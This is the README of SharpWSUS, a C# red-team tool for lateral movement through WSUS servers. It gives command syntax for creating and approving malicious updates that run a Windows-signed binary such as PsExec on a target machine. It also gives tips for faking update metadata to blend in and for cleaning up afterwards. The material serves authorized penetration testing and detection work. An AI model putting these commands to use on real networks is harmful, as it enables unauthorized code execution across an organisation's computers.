SharpWSUS is a C# tool for lateral movement through WSUS. There is a corresponding blog post (https://labs.nettitude.com/blog/introducing-sharpwsus/) with more detailed information about the tooling, its use case and detection.
Massive credit to the resources below, which really did 90% of this for me. This tool is just an enhancement of them for C2 reliability and flexibility.
- https://github.com/AlsidOfficial/WSUSpendu – PowerShell tool for abusing WSUS
- https://github.com/ThunderGunExpress/Thunder_Woosus – C# tool for abusing WSUS
Phil Keeble @ Nettitude Red Team
Commands listed below have optional parameters in <>.
Locate the WSUS server:
Inspect the WSUS server, enumerating clients, servers and existing groups:
Create an update (NOTE: the payload has to be a Windows-signed binary):
SharpWSUS.exe create /payload:[File location] /args:[Args for payload] </title:[Update title] /date:[YYYY-MM-DD] /kb:[KB on update] /rating:[Rating of update] /msrc:[MS RC] /description:[description] /url:[url]>
Approve an update:
SharpWSUS.exe approve /updateid:[UpdateGUID] /computername:[Computer to target] </groupname:[Group for computer to be added to] /approver:[Name of approver]>
Check status of an update:
SharpWSUS.exe check /updateid:[UpdateGUID] /computername:[Target FQDN]
Delete update and clean up groups added:
SharpWSUS.exe delete /updateid:[UpdateGUID] /computername:[Target FQDN] </groupname:[GroupName] /keepgroup>
- The binary has to be Windows-signed, so PsExec, msiexec, MSBuild, etc. could be useful for lateral movement.
- The metadata on the create command is not required, but is useful for blending into the environment.
- If testing in a lab, the first update is usually quick, but each subsequent update will take a couple of hours (this is due to how Windows evaluates whether an update is already installed).